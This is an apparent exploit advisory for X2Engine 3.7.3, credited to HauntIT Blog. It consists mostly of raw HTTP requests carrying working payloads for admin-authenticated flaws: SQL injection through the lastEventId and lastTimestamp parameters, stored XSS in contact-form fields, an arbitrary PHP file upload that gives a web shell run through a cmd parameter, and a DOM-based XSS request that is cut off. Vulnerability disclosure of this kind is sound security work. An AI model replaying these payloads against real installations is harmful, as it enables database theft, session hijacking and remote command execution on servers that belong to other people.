# ============================================================== # Title ...| Multiple vulnerabilities in X2Engine # Version .| X2Engine 3.7.3 # Date ....| .02.2014 # Found ...| HauntIT Blog # Home ....| # ============================================================== [+] For admin logged in # ============================================================== # 1. SQL Injection ------ GET /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/profile/getEvents?lastEventId='mynameissqli&lastTimestamp=0&profileId=1&myProfileId=1 HTTP/1.1 Host: 10.149.14.62 (...) Connection: close ------ Parameter "lastTimestamp" is also vulnerable. # ============================================================== # 2. XSS ------ POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/contacts/create HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 917 Contacts%5BfirstName%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&Contacts%5Btitle%5D=tester&Contacts%5Bphone%5D=&Contacts%5Bphone2%5D=&Contacts%5BdoNotCall%5D=0&Contacts%5BlastName%5D=tester&Contacts%5Bcompany_id%5D=&Contacts%5Bcompany%5D=&Contacts%5Bwebsite%5D=&Contacts%5Bemail%5D=&Contacts%5BdoNotEmail%5D=0&Contacts%5Bleadtype%5D=&Contacts%5BleadSource%5D=&Contacts%5Bleadstatus%5D=&Contacts%5BleadDate%5D=&Contacts%5Binterest%5D=&Contacts%5Bdealvalue%5D=%240.00&Contacts%5Bclosedate%5D=&Contacts%5Bdealstatus%5D=&Contacts%5Baddress%5D=&Contacts%5Baddress2%5D=&Contacts%5Bcity%5D=&Contacts%5Bstate%5D=&Contacts%5Bzipcode%5D=&Contacts%5Bcountry%5D=&Contacts%5BbackgroundInfo%5D=&Contacts%5Bskype%5D=&Contacts%5Blinkedin%5D=&Contacts%5Btwitter%5D=&Contacts%5Bfacebook%5D=&Contacts%5Bgoogleplus%5D=&Contacts%5BotherUrl%5D=&Contacts%5BassignedTo%5D=admin&Contacts%5Bpriority%5D=&Contacts%5Bvisibility%5D=1&yt0=Create ------ Also vulnerable: Contacts%5Bwebsite%5D, Contacts%5Bcompany%5D, Contacts%5Binterest%5D... # ============================================================== # 3. Arbitrary File Upload ------ POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/media/ajaxUpload?CKEditor=input&CKEditorFuncNum=1&langCode=en HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 241 -----------------------------20967107015427 Content-Disposition: form-data; name="upload"; filename="mishell.php" Content-Type: application/octet-stream -----------------------------20967107015427-- ------ To access shell, go to: http://10.149.14.62/(...)/X2Engine-3.7.3/x2engine/uploads/media/admin/mishell.php?cmd=id # ============================================================== # 4. DOM-based XSS ------ POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/media/ajaxUpload?CKEditor=input&CKEditorFuncNum='');&langCode=en HTTP/1.1 Host: 10.149.14.62 (...)